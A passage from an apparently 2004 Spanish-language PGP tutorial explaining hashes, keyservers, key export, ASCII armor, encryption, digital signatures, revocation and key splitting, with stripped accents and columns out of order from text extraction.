se usan dos tipos de algoritmos hash: MD5 (Message Digest 5), 1992. Este algoritmo, evolucin del MD4 (que a su vez lo es del MD2), es uno de los ms extendidos en Internet. Fue ideado por el matemtico Ron Rivest (uno de los padres de RSA) y genera cadenas hash de 128 bits a partir de una entrada de cualquier tamao. Si eres usuario de GNU/Linux y alguna vez has descargado una imagen ISO de Internet, habrs visto que junto a los ficheros ISO suelen haber otros ficheros md5 (y a veces, un tercer fichero md5.asc). Ese fichero md5 contiene la cadena MD5 de la imagen ISO y permite comprobar que se ha descargado correctamente o que no ha sido altera da. El archivo md5.asc es una firma PGP del fichero MD5, de forma que nos aseguramos adems que el fichero MD5 ha sido generado por el firmante. Existen muchas implementaciones de MD5 para que po demos usarla de forma cmoda en nuestro sistema. Los usuarios de Linux tienen el paquete md5sum, que va in cluido con prcticamente cualquier distribucin, mientras que los usuarios de Windows deben descargar alguna de las implementaciones de Internet, por ejemplo yo re comiendo sta: http://www.fourmilab.ch/md5/ SHA-1 (Secure Hash Algorithm), 1994. SHA-1 naci de manos del NIST como ampliacin al SHA tradicional. Este algoritmo, pese a ser bastante ms lento que MD5, es mu cho ms seguro, pues genera cadenas de salida de 160 bits (a partir de entradas de hasta 2^64 bits) que son mu cho ms resistentes a colisiones simples y fuertes. Hoy en da, es el estndar en PGP. De esta forma, si deseamos aadir la clave de otra perso na a nuestro anillo solamente debe proporcionarnos el fin gerprint de su clave, pues nosotros nos encargaremos de buscar la clave en los servidores pblicos, descargarla y verificar que el fingerprint es el mismo. Trust Model: En este campo tenemos dos medidores: el primero de ellos mide la validez de la clave (por ejemplo, una clave caducada no sera vlida), y el segundo mide

21/68

TALLER DE CRIPTOGRAFA - El sistema PGP

el modelo de confianza que depositamos en esa clave (s to puede resultar muy til cuando tenemos gran cantidad de claves en nuestro anillo y al recibir un correo deseamos saber de un vistazo cunto confiamos en esa clave). La opcin Implicit Trust solamente es vlida para claves con parte pblica y privada, es decir, claves que nos pertene cen completamente aunque no hayan sido generadas en nuestra mquina. Es importante destacar que para poder otorgar confianza a una clave debemos haberla firmado previamente, pero de las firmas hablaremos ms tarde. Hay una pestaa ms dentro del men de propiedades de la clave, la pestaa Subkeys. En ella podemos consultar las subclaves existentes dentro de la clave principal. Adicionalmente, y en el caso de claves con parte privada, podremos adems aadir nuevas subclaves y recovar o eli minar las ya existentes. En realidad cuando generamos la clave tras la instalacin de PGP, generamos tambin una subclave principal de ci frado, que es la que veremos en esta ventana. En PGP esta subclave principal (imprescindible para el correcto funcio namiento de la clave) se genera de forma automtica, pe ro cuando veamos GnuPG en el siguiente artculo veremos que debemos generarla nosotros mismos a mano... lo cual puede ser un poco ms engorroso pero tambin nos per mite afinar hasta el lmite el tipo de clave que queremos usar. Si deseamos usar ms de un nombre y/o correo electrnico en nuestra clave, podemos aadirlos fcilmen te. Solamente hay que pulsar con el botn derecho sobre la clave y seleccionar Add seguido de Name. PGP nos pedir el nuevo nombre y correo que deseamos aadir y se generar automticamente. Para seleccionar cul que remos que sea el nombre principal de la clave, debemos seleccionarlo con el botn derecho y elegir la opcin Set as Primary Name. El motivo para cambiar nuestro servidor principal a este segundo es que actualmente la PGP Corporation est rea lizando importantes cambios en el sistema de su servidor principal (el primero) y muchas de las claves no estn dis ponibles al no haber sido verificadas an por sus respec tivos dueos. Para no tener problemas con claves que no estn, usaremos el servidor europeo de claves. Ahora abriremos PGPkeys y pulsaremos en el men Ser ver seguido de Search (tambin es posible acceder di rectamente mediante el atajo ctrl+F). ste es el men de bsqueda de claves de PGP. Lo primero que hay que hacer es cambiar el servidor donde vamos a buscar las claves al europeo, y ahora vamos a realizar unas cuantas bsquedas con distintos criterios para familiarizarnos con el manejo de PGP. En los criterios de bsqueda seleccionaremos Key ID e is. Introducimos 0x517D0F0E y pulsamos search, tras lo cual aparecer un nico resultado en forma de clave pblica a nombre de Linux Kernel Archives Verification Key <ftpadmin@kernel.org>.

Pulsad con el botn derecho sobre la clave y seleccionad la opcin Import to Local Keyring, momento a partir del cual esa clave pasar a formar parte de nuestro anillo de claves. Bien, ahora vamos a comprobar que vosotros y yo tenemos la misma clave, para lo cual nos valdremos del fingerprint de la misma: C75D C40A 11D7 AF88 9981 ED5B C86B A06A 517D 0F0E Si el fingerprint que podis ver en la clave que hay en vuestro anillo es este mismo (que lo ser), significa que la clave es la misma para ti y para m. Ahora vamos a realizar una se gunda bsqueda cambiando los criterios. Ahora usaremos User ID y contains. Introduciremos noticias hispasec (aprovecho para mandar un saludo a toda la gente de hispasec por su mag nfico trabajo) y realizaremos la bsqueda. El resultado en este

Vamos a practicar un poco todo lo visto hasta el momento... Lo primero que vamos a hacer es ir al men de opciones de PGP (ya sabis cmo) y al apartado Ser vers. Una vez ah, tendris dos servidores: ldap://keyserver.pgp.com y ldap://europe.keys.pgp.com:11370. Seleccionad el segundo de ellos y pulsad en el botn Set As Root que hay en el men de la derecha. As cambiaremos nuestro servidor de claves principal.

22/68

TALLER DE CRIPTOGRAFA - El sistema PGP

caso sern cuatro claves RSA legacy. estos servidores. Por qu os cuento esto? Porque es MUY importante que mantengis copias de seguridad de vuestras claves privadas de forma local (y a ser posible, no en el mis mo disco duro) porque si perdis vuestra clave privada, NO podris recuperarla y NO podris volver a descifrar nada que se cifre a esa clave ni generar ms firmas (cof, cof, querido amigo mo AcidBorg). Y cmo creamos copias de seguridad locales? Mediante la opcin de exportacin de claves. Al pulsar sobre la clave con el botn derecho y seleccionar la opcin Export aparecer una ventana

Las importaremos todas a nuestro anillo de claves. En el momento de escribir este artculo (an en el 2004) la bsqueda produce solamente cuatro resultados, con las cla ves de los aos 2001, 2002, 2003 y 2004. Cuando realicis estas prcticas aparecer una clave ms, la del 2005. Ahora podremos ver que nuestro anillo de claves est bas tante menos solitario de lo que estaba antes. Ahora, borrad todas las claves de noticias hispasec que no estn ya vigen tes. Para ello, seleccionad todas las claves manteniendo pul sada la tecla control y luego pulsad con el botn derecho y elegid la opcin Delete. Las teclas tambin pueden ser co piadas, cortadas o pegadas como cualquier otro tipo de ar chivo. Bien, tenemos ya nuestra clave creada y sabemos cmo po demos obtener nuevas claves de los servidores, pero cmo pueden otras personas obtener nuestra clave? Pues para eso, obviamente, nuestra clave debe estar en el servidor de cla ves. Para publicar una clave en el servidor de claves, sola mente hay que pulsar en el botn derecho sobre la clave y seleccionar Sent To y seleccionar a qu servidor enviar la misma. Si seleccionis Domain Server, se enviar al ser vidor que tengis configurado por defecto. Probad a publicar en el servidor europeo de claves vuestra nueva clave recin creada y despus probad a buscarla para poder estar seguros de que se ha publicado correctamente. Sera bueno que la buscarais por diversos criterios de bsqueda, para practicar un poco ms con el motor de bsqueda de PGP. Otra opcin importante es la de actualizar claves que ya te nemos en nuestro anillo de claves. Se puede hacer de dos formas: o bien buscando la clave mediante el motor de bsqueda de PGP, o bien usando la opcin de actualizacin de PGP. Para hacer uso de la opcin de actualizacin de claves de PGP pulsad sobre la clave con el botn derecho y seleccionad Update. Aparecer una ventana en la que podremos ver la clave y desarrollar el rbol de la misma para poder obser var el estado en el que se encuentra en el servidor. Si deci dimos que queremos incorporar los cambios existentes en la clave a nuestro anillo de claves local, debemos pulsar en Import y el software automticamente gestionar la importacin y actualizacin. Cmo puede cambiar una clave una vez subida a un servi dor? Pueden aadirse, eliminarse o revocarse subclaves, fo tografas, firmas... IMPORTANTE: Absolutamente todas las claves que se ex portan a un servidor de claves y, por tanto, toda clave pu blicada en un servidor pblico, solamente consta de parte pblica. Es imposible exportar un bloque privado a uno de donde debemos seleccionar el destino de la clave exportada. Es muy importante fijarse en la casilla Include Private Key(s) (marcada en la imagen), pues sta es la opcin que nos permite, al exportar una clave, incluir su parte privada y por tanto realizar una copia de seguridad de nuestra clave. sta opcin est disponible nicamente para claves con parte pblica y privada (obviamente) y est desmarcada por de fecto. El fichero generado ser un archivo con extensin .asc que contendr, en forma de armadura ASCII, la clave exportada (bien sea nicamente la parte pblica o ambas partes). Uhm... un concepto nuevo a introducir: armadura PGP.

PGP puede generar principalmente tres tipos de ficheros atendiendo a su finalidad: archivos cifrados (.pgp o .asc), archivos de firma (.sig o .asc) y archivos de claves (.asc). Atendiendo a su forma, los tipos de ficheros son dos: los ar chivos de armadura ASCII y los archivos MIME/PGP. Cul es la diferencia entre ellos? Las armaduras ASCII son fiche ros .asc de caracteres ASCII (como su propio nombre indica) que son perfectamente legibles -que no comprensibles- y pueden ser fcilmente tratados con un editor de texto plano, son cmodos para trabajar en web con ellos... los ficheros MIME/PGP, por contra, son caracteres que usan la codificacin MIME y que NO pueden ser ledos con un editor de texto plano (segn qu editor se use, no veremos nada o veremos smbolos extraos). Para los que no sepan qu es ASCII (American Standard Code for Information Interchange), se trata de un estndar de representacin numrica de caracteres. El ASCII estndar contiene 128 smbolos, y el extendido 256. Su uso ya no es muy habitual, pues ha sido progresivamente sustituido por UNICODE. Para conocer ms sobre la tabla ASCII: http://www.asciitable.com/

23/68

TALLER DE CRIPTOGRAFA - El sistema PGP

Los archivos cifrados y de firma pueden adoptar cualquiera de las dos formas , mientras que los archivos de claves siempre sern armaduras ASCII. Mi recomendacin, para cualquier tipo de fichero que deseemos generar, es usar armaduras ASCII. Vamos a ver la pinta que tienen... para ello abrimos con un editor de texto (por ejemplo, el bloc de notas) la clave previamente exportada. Veremos una gran cantidad de letras ASCII y unas etiquetas de inicio y de final que delimitan ambas partes de la clave. -----BEGIN PGP PRIVATE KEY BLOCK----Version: {versin del software} {parte PRIVADA de la clave} -----END PGP PRIVATE KEY BLOCK---------BEGIN PGP PUBLIC KEY BLOCK----Version: {versin del software} {parte PBLICA de la clave} -----END PGP PUBLIC KEY BLOCK----Como vemos, las cabeceras indican cul es el contenido de la armadura ASCII (clave privada y pblica respectiva mente, pero podran ser otros que ms adelante veremos), y la lnea Version indica qu software hemos usado para generar esa armadura (en vuestro caso ser PGP 8.1.0). Los caracteres ASCII representan el contenido de la arma dura, bien sea la clave como en este caso, un mensaje ci frado o una firma. El trabajar con armaduras ASCII en lugar de ficheros MIME/PGP nos da una gran flexibilidad al poder tratar el contenido como texto plano. Si habis visto alguna vez en una pgina web que hay un enlace a una clave PGP pblica (como por ejemplo en mi web), siempre os encontraris con el archivo .asc que puede ser visualizado correctamen te mediante vuestro navegador web as como guardado de forma directa. Para las claves siempre es as, pero por ejemplo si quisiramos publicar en un foro un fichero ci frado, sera mucho ms cmodo publicar como texto la ar madura ASCII que andar adjuntando el fichero MIME/PGP (adems, no todos los foros soportan la opcin de adjuntar ficheros). Encrypt. Nos encontramos con una pantalla donde pode mos seleccionar (arrastrando y soltando) la o las claves que podrn descifrar el fichero cifrado. Adems, tenemos a nuestra disposicin las si guientes opciones: Text Output: Al marcar esta opcin, esta mos indicando al programa que deseamos que genere un fichero de ar madura ASCII .asc en lugar de un fichero MIME/PGP .pgp. Yo, por comodidad, recomiendo usar este tipo de ficheros cifrados, pero si prefers usar MIME/PGP, da ab solutamente igual. Input Is Texto: Mediante esta opcin estamos indicando a PGP que debe tratar la entrada como si de texto se tra tara... esto es algo que por el momento no vamos a usar, aunque cuando tratemos el tema de cifrado de correo electrnico veremos que es bastante importante. Por el momento olvidad esta opcin. Wipe Original: Tras cifrar el fichero, borra de forma se gura el original. Ms adelante hablaremos de esta opcin de PGP con ms detalle. Creas que con borrar un fichero era suficiente? No, claro... pero borrarlo y vaciar la papelera de reciclaje TAMPOCO. Las tcnicas y, sobre todo, los fundamentos tericos sobre el bo rrado seguro de datos son un tema muy interesante pero complejo... dara para un artculo entero e independiente. Quin sabe... Secure Viewer: Si eres un fantico de la criptografa (o un paranoico de tres pares de narices) esta opcin te encantar (eso s, nicamente sirve para ficheros de tex to). El uso de esta opcin genera dos efectos en el archi vo... pero que se manifestarn al descifrarlo. El primero de ellos es un aviso eyes only que os recordar a las pelculas de James Bond... el aviso es el siguiente: The message you are decrypting is for your eyes only. It is recommended that this message only be read under the most secure circumstances. Que traducido vendra a decir algo como: El mensaje que ests descifrando es slo para tus ojos. Se recomienda que este mensaje sea visto nicamente bajo las circunstancias ms seguras. De entrada acon goja un poco, verdad? Pues veris lo que vie ne ahora... Si pulsamos aceptar nos encontrare mos con el Se cure Viewer

Bueno, por fin hemos llegado al punto que todos estaban esperando: vamos a cifrar y descifrar archivos usando PGP. Lo primero que necesitamos es un fichero que acte como texto en claro (como dijimos anteriormente, llamamos texto en claro en un criptosistema a cualquier elemento que no est cifrado... no obstante, cualquier fichero del ordenador est compuesto por ceros y unos, por lo que en realidad no es tan complicada la abstraccin de imagi narlo como un texto . Podemos seleccionar un fichero cualquiera, pero para que coincida con el ejemplo, crea remos un fichero llamado texto.txt. En su interior podis escribir lo que queris. Ahora pulsamos con el botn derecho sobre el fichero y seleccionamos el men PGP para despus seleccionar

24/68

TALLER DE CRIPTOGRAFA - El sistema PGP

de PGP: un visor que no solo es seguro en cuanto a su for ma de almacenar los datos en memoria, sino que adems es seguro en cuanto a su visualizacin en pantalla. Si usis la opcin Use TEMPEST Attack Prevention Font (que est marcada por defecto), el texto se visualizar con una fu ente segura contra los ataques TEMPEST. Y... qu es TEMPEST? Es una tcnica de espionaje que ralla la ciencia-ficcin, pero que os aseguro que es real. Si alguno de vosotros ha ledo la genial novela Criptonomicn de Neal Stephenson, esta tcnica la cono cer con el nombre de Phreaking Van Eck. Todos sabemos que los monitores funcionan mediante aplicacin de corrientes elctricas (en el caso de monitores CRT, mediante el barrido de electrones; en el caso de TFT, mediante aplicacin de diferencias de potencial a los pix els), y que las corrientes elctricas generan campos elc tricos... Pues el ataque TEMPEST consiste en detectar de forma re mota los campos elctricos generados por un monitor (podis imaginar que son muchsimos) e interpretarlos para recomponer, tambin de forma remota, la imagen que gener esos campos. Casi nada, vamos... Si queris saber ms sobre TEMPEST: http://www.eskimo.com/~joelm/tempest.html al ser nica la clave, a partir de varios mensajes distintos cifrados a la misma clave, se pueden realizar ataques crip toanalticos (el criptoanlisis es la rama opuesta de la crip tografa, que se encarga de descifrar criptogramas. Ambas ramas conforman lo que denominamos criptologa) de mu chos tipos: fuerza bruta, ataques estadsticos, probabils ticos... y son bastante ms fciles de romper que los asimtricos (lo cual no quiere decir, ni mucho menos, que sea fcil). Como curiosidad histrica: la mquina Enigma usada por los Alemanes durante la Segunda Guerra Mundial era un aparato criptogrfico simtrico tremendamente poderoso para ser mecnico y para la poca en que existi. Pero, como ya dijimos antes, una cadena es tan dura como el ms dbil de sus eslabones, y aunque la Enigma aument su complejidad durante la Guerra (con nuevos rotores, ms permutaciones del teclado...), el procedimiento exiga que se cifrara por duplicado la clave del da al inicio del mensaje. Este gravsimo error permiti a la gente de Bletchley Park romper el cifrado Enigma una y otra vez, dado que ese pequeo detalle reduca la complejidad del criptoanlisis del problema enormemente. Ya hemos dicho que el principal problema de un cripto sistema simtrico es que el cifrado repetido de mensajes a una misma clave facilita la ruptura de la misma... por tanto, porqu no usar una clave simtrica para cada men saje? Claro, sera un engorro cambiar la clave cada vez... porque necesitaramos un canal seguro para transmitirla y sera la vuelta al principio, verdad? Pues NO. Una clave simtrica es muchsimo ms pequea (256 bits como mximo) que cualquier mensaje que vayamos a cifrar, por pequeo que sea ste. As pues, cifrar la clave simtrica con una clave asimtrica no requiere demasiado tiempo... pues eso es exactamente lo que hace PGP (y otros estndares cifrados como SSH o SSL). Al cifrar un archivo,

Conventional Encryption: Al activar esta opcin, el fichero se cifra nicamente con una clave simtrica (de las que hablamos en las opciones de PGP) con la clave que nosotros introduzcamos. Para entender la diferen cia con el cifrado estndar de PGP hay que esperar un poquito a que lo veamos. Self Decrypting Archive: Genera un fichero con cifra do simtrico que no necesita de PGP para ser descifra do. Para entenderlo mejor, un SDA sera a PGP como un EXE autoextrable a WinZip. Tambin se pueden crear SDA's directamente desde el men PGP sobre el fichero con la opcin Create SDA. Bien, ya sabemos cmo cifrar archivos con PGP... pero queda lo ms interesante (al menos si eres una mente in quieta): saber cmo cifra PGP. Lo primero que debemos tener en cuenta es que el coste computacional (en potencia y, por tanto, en tiempo) de cifrar algo a una clave asimtrica (ms si hablamos de claves grandes, de 2048 bits o ms) es MUY grande com parado a, por ejemplo, el cifrado simtrico o la generacin de hashes. Pero las claves asimtricas son muy poderosas, podramos decir que son virtualmente irrompibles (romp erlas con las actuales tcnicas requerira ms tiempo de lo que lleva existiendo el Universo...). En el otro lado del cuadriltero tenemos el cifrado simtri co, que es muy rpido, pero tiene una pega importante:

se genera una clave simtrica aleatoria (nota para los puris tas: pseudoaleatoria) que llamaremos clave de sesin con la que se cifra el mensaje. Posteriormente se cifra la clave de sesin con la clave pblica de cada uno de los destina tarios del mensaje. El ltimo paso es destruir la clave de sesin y empaquetar todos los datos en una armadura ASCII (o bien un fichero MIME/PGP). Mediante este mecan ismo tan sencillo e ingenioso logramos un cifrado rpido dado que el mensaje (la parte de mayor tamao)

25/68

TALLER DE CRIPTOGRAFA - El sistema PGP

es cifrado a una clave simtrica, a la vez que muy seguro porque la clave simtrica es usada una sola vez y se trans mite mediante cifrado asimtrico. Descifrar archivos quiera puede generar un hash de un fichero dado... y tam bin cualquiera podra interceptar un envo con un fichero y su hash, modificar el fichero, recalcular el hash y reen viarlo, todo ello sin que el destinatario tenga ninguna for ma de saber si esta modificacin ha ocurrido. Demos una vuelta ms de tuerca al concepto anterior para aumentar la seguridad del sistema. Calculemos el hash del fichero y luego cifremos este hash a la clave pblica del destinatario. Bien, este mtodo tampoco resultara vlido, porque cualquier persona puede cifrar a una clave pblica, as que nicamente lograramos complicar la vida un poco a un posible atacante, que tendra que modificar el fichero, recalcular el hash y codificar el mismo a la clave pblica del destinatario. An as, hemos introducido un elemento interesante en nuestra particular ecuacin: el atacante no podr visualizar la informacin que quiere modificar, en este caso el hash. Si recordis los tiempos del instituto, esos problemas don de haba un paso mgico que o se te ocurra o no haba forma de continuar... pues aqu es donde ocurre nuestro particular paso mgico. Como dijimos casi al principio, una clave asimtrica se compone de dos claves COMPLEMENTARIAS. Esto significa que lo que cifremos con una, puede ser descifrado con la otra y viceversa. El mto do normal de uso de estas claves en PGP es cifrar algo a una clave pblica, de forma que el usuario de la clave pri vada y solamente l pueda descifrar esa informacin, pe ro... y si lo que queremos es, como en este caso, realizar un cifrado que nicamente nosotros podamos realizar y que cualquier persona puede comprobar? Es justo lo con trario... por lo que deberamos realizar justamente el cifra do contrario. Claro! Esa es la idea: cifrar algo a nuestra clave privada, de for ma que cualquiera que tenga nuestra clave pblica (la cual se debera poder descargar de un servidor de claves) pue da descifrar ese mensaje. Ahora llevemos ese concepto al problema concreto que nos planteamos. Imaginemos que generamos un hash del fichero a firmar, y ese hash lo ci framos a nuestra clave privada. Pues nos encontramos con una firma digital PGP.

es mucho ms sencillo que cifrarlos. Podemos o bien se leccionar la opcin Decrypt & Verify (la verificacin co rresponde a la parte de firmas, que veremos a continuacin) del men contextual de PGP, o bien direc tamente hacer doble click sobre el fichero. Solamente pue de darse el caso especial del que el fichero haya sido ci frado con la opcin Secure Viewer, en cuyo caso saldr el dilogo de advertencia (que deberemos aceptar o can celar) y posteriormente, si aceptamos, el visor seguro de datos con el mensaje en cuestin. Cmo funciona el descifrado de datos en PGP? Una vez que sabemos cmo funciona el cifrado, el paso contrario es trivial. Cuando desciframos un fichero lo primero que ocurre es que mediante nuestra clave privada desciframos la parte que contiene la clave de sesin del mensaje y que fue cifrada a nuestra clave pblica (si adems de la nues tra fue cifrada a otras, ignoraremos los dems fragmentos que contienen la clave de sesin cifrada a esas otras claves pblicas), para a continuacin usar esa clave de sesin pa ra descifrar el mensaje original.

Otra de las aplicaciones ms importantes del sistema PGP es la firma digital. Todo sistema de firma digital debe cum plir unas caractersticas: 1) Integridad de la informacin: En caso de que la informacin se vea alterada tras su firma, sta deja de ser vlida. 2) Autenticidad: Asegura que el solamente el dueo de la clave privada ha sido capaz de generar la firma. 3) No repudio: El usuario que gener la firma no puede negar haberlo hecho. Ahora llega otro de nuestros ejercicios de imaginacin...

Imaginemos que queremos idear, con lo que sabemos, una forma de implementar una firma digital que cumpla las ca ractersticas anteriormente citadas. Seguramente lo pri mero que se os ocurra a la mayora sea realizar un hash del fichero a firmar y pasarle la cadena generada junto al fichero. La primera de las caractersticas se cumple, pues como sabemos, si modificamos cualquier dato del fichero, el hash dejar de coincidir. Pero la segunda no se cumple (y, por consiguiente, la tercera tampoco), dado que cual

Para fimar un fichero, debemos pulsar con el botn dere cho sobre el fichero y seleccionar la opcin Sign. Adicionalmente podemos seleccionar Encrypt & Sign para cifrar y firmar. Al seleccionar la opcin de firma, nos encontrare mos con una ventana con las siguientes op ciones:

26/68

TALLER DE CRIPTOGRAFA - El sistema PGP

Detached Signature: Al seleccionar esta opcin (que es t activada por defecto), la firma estar separada del fi chero, generando un fichero independiente cuyo nombre ser el nombre completo del archivo firmado (incluyendo su extensin) y la extensin .sig (independientemente de que sea una firma en la forma de armadura ASCII o PGP/MIME). Por ejemplo, prueba.txt generara la firma prueba.txt.sig. En caso de no seleccionar esta opcin, se generar un fi chero de extensin .asc (para armadura ASCII) .pgp (para PGP/MIME) que contendr el fichero y su firma. El sistema de generacin del nombre ser igual, y prue ba.txt pasara a ser o bien prueba.txt.asc (para armadura ASCII) o bien prueba.txt.pgp (para PGP/MIME). Text Output: Al seleccionar esta opcin, estamos indi cando que deseamos generar la firma en la forma de ar madura ASCII. Input Is Text: Seleccionando esta opcin estamos indi cando al software que la entrada debe ser tratada cono texto. Cuando el destinatario reciba el fichero y su hash, realizar dos operaciones: por un lado, obtendr por su propia cuenta el hash del fichero (obviamente, utilizando el mismo algorit mo que usamos nosotros); y por el otro, utilizar nuestra clave pblica para descifrar el hash que nosotros generamos. Solamente queda comparar ambos hashes: si son idnticos, la firma es vlida y podemos garantizar que la informacin no ha sido alterada y que la gener el firmante. tenece a quien dice pertenecer. As, si yo he firmado la clave de Wadalberto HxC porque le conozco y confo en l, si t me conoces y confas en m (bueno, y en mi palabra ), puedes considerar la clave de Wadalberto HxC como buena. As se genera un anillo de confianza. Hay gente que se toma esto muy en serio. Por ejemplo, los desarrolladores de Debian (una de las distribuciones de GNU/Linux ms famosas) conforman un enorme anillo de confianza, y para entrar en l, el proceso de firma de claves pblicas se realiza entre las dos personas implicadas... en persona. En el VI Congreso de Software Libre de HispaLinux, celebra do en Septiembre de 2003, hubo una charla de GnuPG en la que hubo un intercambio de claves donde los participantes intercambiaban sus KeyID y fingerprint... y hasta dejaron sus DNI's encima de una mesa para que todo el mundo pudiera comprobar las fotografas... no os asustis, yo no llego a ese extremo... Existen principalmente dos tipos de firma sobre clave pblica en PGP: la exportable y la no exportable. La primera de ellas ser exportada al exportar la clave (bien a un fichero o bien a u n s e r v i d o r d e c l ave s ) , m i e n t ra s q u e l a s e g u n d a nicamente tiene validez dentro de nuestro anillo de claves y no ser exportada en ningn caso. Para que el concepto de anillo de confianza funcione, se deben usar firmas exporta bles y, tras la firma, exportar la clave a los servidores de cla ves apropiados, de forma que los cambios se efecten en s tos y cualquier persona que descargue o actualice la clave desde el servidor obtenga los cambios efectuados sobre ella. Para firmar una clave pblica con PGP debemos seleccionarla y pulsar con el botn derecho sobre ella para despus elegir Sign (para firmar nicamente una parte de la clave el pro ceso es el mismo pero seleccionando el elemento en cuestin). Veremos una pantalla

Para verificar una firma (sea el fichero cifrado o no) debemos pulsar sobre l con el botn derecho y seleccionar la opcin Decrypt & Verify. Imaginemos que estamos en la situacin del atacante. En es ta ocasin si puede descifrar el hash, pues puede obtener nuestra clave pblica de cualquier servidor de claves. Tambin puede alterar el fichero y generar su propio hash... pero jams podr cifrar ese hash a nuestra clave privada. Simple y efectivo.

La firma digital se puede aplicar a cualquier tipo de informacin que maneje el ordenador, no nicamente a fiche ros. Por ejemplo, podemos firmar... claves pblicas. Si os fi jis en el rbol de vuestra propia clave, donde se nos muestra un mensaje en el que nos advierten de las implicaciones de firmar una clave pblica, el nombre de la clave y el fingerprint de la misma. Hay tambin una ca silla en la que podemos marcar la opcin Allow signature to be exported. Others may rely upon my signature. que activa la opcin de firma exportable. vuestra propia clave pblica se encuentra por defecto firma da por vuestra clave privada desde el momento de su generacin. Y cul es la utilidad de firmar claves pblicas? Como ya hemos visto, una firma nicamente puede generar la el dueo de la parte privada de la clave. As pues, cuando firmamos una clave pblica (es decir, ciframos a nuestra cla ve privada el hash de esa clave pblica) estamos dando tes timonio de que esa clave es de confianza, es decir, que per Pulsando en el botn More Choices nos encontramos con las opciones avanzadas de firma de PGP. En este men po dremos elegir dos tipos de firmas PGP peculiares y no muy usadas: el Meta-Introducer Non-Exportable y el Trusted Introducer Exportable, as como la opcin de generar cual quiera de los cuatro tipos de firma con una fecha de expiracin. Estos dos tipos de firmas son usadas para des cribir una confianza ms profunda, detallada en su nivel 27/68

TALLER DE CRIPTOGRAFA - El sistema PGP

de confianza y con la posibilidad de restringir el dominio donde exista el correo de la clave. No dar ms detalles de estas opciones porque son usaras muy raramente (de hecho no las he visto ms que un par de veces). Al aceptar este dilogo pasaremos a otro donde debemos seleccionar la clave privada que queremos usar para firmar esta clave pblica (en caso de disponer de ms de una cla ve privada) e introducir su passphrase para confirmar la opcin. Cuando queremos comprobar que una clave pblica man tiene todas sus firmas y no han existido revocaciones (de lo que hablaremos a continuacin) debemos sincronizar la clave de nuestro anillo con la del servidor de claves. Para ello pulsaremos sobre la clave con el botn derecho y se leccionaremos la opcin Reverify Signatures. Es importante tener en cuenta que para poder establecer una confianza en una clave pblica (ya vimos cmo se ha ca esto cuando hablamos de la clave PGP) es imprescindi ble haber firmado previamente la misma. Por ello, es til utilizar las firmas no exportables para poder establecer nuestro sistema de confianza en nuestro anillo local de cla ves. Al igual que en la revocacin de claves completas, al actua lizar la clave (y en este caso adems, al sincronizar las fir mas con la opcin Reverify Signatures) se actualiza el ani llo local de claves con las revocaciones correspondientes. Existe un tipo especial de firmas exportables que tienen como propiedad especial la imposibilidad total de ser revo cadas. Una vez generada una firma de este tipo y actuali zada la clave en el servidor pertinente, es absolutamente imposible revocar esa firma. Esta opcin NO est imple mentada en PGP, pero por ejemplo GnuPG s la implemen ta. Existe una ltima opcin de las revocaciones por la cual podemos aadir revocadores a nuestra clave. Aadir un re vocador (representado por otra clave pblica) a nuestra clave significa que estamos otorgando al propietario de esa clave permiso para revocar nuestras firmas. Podemos ima ginar un ejemplo en el que esta caracterstica sera til: imaginemos un equipo de trabajo en el que hay un jefe y varios empleados y cuyo trabajo se coordina con archivos cifrados y un sistema de claves en anillo de confianza. Podra ser una obligacin de cada uno de los empleados el aadir a su jefe como revocador, de forma que las firmas de cada empleado pudieran ser revocadas o bien por el mismo usuario o bien por su jefe. Esta opcin realmente tampoco es muy usada. Para aadir revocadores a nuestra clave pulsaremos sobre ella con el botn derecho y elegiremos Add seguido de Revoker. Al consultar las propiedades de la clave vere mos una nueva pestaa de ttulo Revokers donde podre mos consultar los revo cadores definidos en nuestra clave.

Las revocaciones son un mecanismo ideado para poder dar marcha atrs en algunos procesos crticos de PGP, como por ejemplo la publicacin de claves o la firma de claves pblicas. Imaginemos que nos generamos una nueva clave y desea mos eliminar la vieja. Si nuestra clave ha tenido bastante difusin y est publicada en servidores de claves nos en contraremos con el problema de que cualquier persona, por error, puede bajarse la clave antigua y utilizarla... y quiz ni siquiera el correo electrnico de la clave sea vlido ya. Para evitar estas situaciones, podemos revocar de for ma completa nuestra clave y despus actualizarla en los servidores de claves. De esta forma, la prxima vez que alguien actualice nuestra clave pblica, nuestra clave en su anillo local pasar tambin a estar revocada y NO podr volver a cifrar a esa clave. El concepto de revocaciones puede ser tambin aplicado a las firmas de claves pblicas. Imaginemos que hemos fir mado por error una clave pblica de forma exportable y hemos actualizado los servidores de claves con ella (hom bre, hacer todo eso por error... ya es despiste, s... ) o que una clave que habamos firmado resulta ser falsa, falta de confianza... o cualquier cosa por el estilo. Podemos revocar nuestras firmas sobre otra clave de forma que quede constancia que nosotros explcitamente hemos eliminado la validez de esa firma.

Esta opcin es una de las ms avanzadas e in teresantes de PGP, pero no se usa prcticamente. Gracias a la opcin de definir claves comparti das, podemos dividir una clave completa (con parte pblica y privada) en varias subclaves. Cada una de esas subclaves tendr su propio passphrase y un valor numrico asociado que define su importancia, y podremos igualmente definir el valor total necesario para realizar cualquier accin con la clave.

Para dividir una clave pulsaremos en ella con el botn derecho y seleccionaremos Share Split.

28/68

TALLER DE CRIPTOGRAFA - El sistema PGP

En la pantalla que aparecer a continuacin podremos definir cada usuario y su va lor, as como el valor total necesario para llevar a cabo acciones. Al pulsar en el botn Split Key el progra ma nos pedir que le indi quemos un directorio donde almacenar los fragmentos de la clave. A partir de ese mo mento, cualquier accin que deseemos realizar con esa clave estar precedida de un dilogo de reconstruccin de la clave donde se irn solici tando los archivos y passphrases pertinentes. Haciendo un smil, podemos considerar esta opcin como las famosas dobles llaves que tenan que activar simult neamente los operarios de silos atmicos para realizar la orden de lanzamiento. dis verlo en los voltajes del procesador, por ejemplo), ambos se interpretaran como un uno, pero con unos apa ratos de medida suficientemente precisos, podramos ave riguar qu haba escrito ANTES en esa zona del disco duro, independientemente de lo que haya escrito ahora. Para evitar que esa informacin pudiera ser recuperada se deben usar herramientas de borrado seguro de datos. Hay varios mtodos para esto: sobreescritura ISAAC, DoD 5220-22.M del Departamento de Defensa de EEUU (basado en ISAAC), mtodo Gutmann... pero no es la finalidad de este artculo el profundizar sobre este tema. S diremos que PGP incorpora una herramienta de borrado seguro de datos llamada Wipe que est basada en el mtodo DoD 5220-22.M y que permite una reescritura se gura de los datos mediante un nmero de pasadas confi gurable desde las opciones de PGP (por defecto 3, y eso es mucho ms que suficiente).

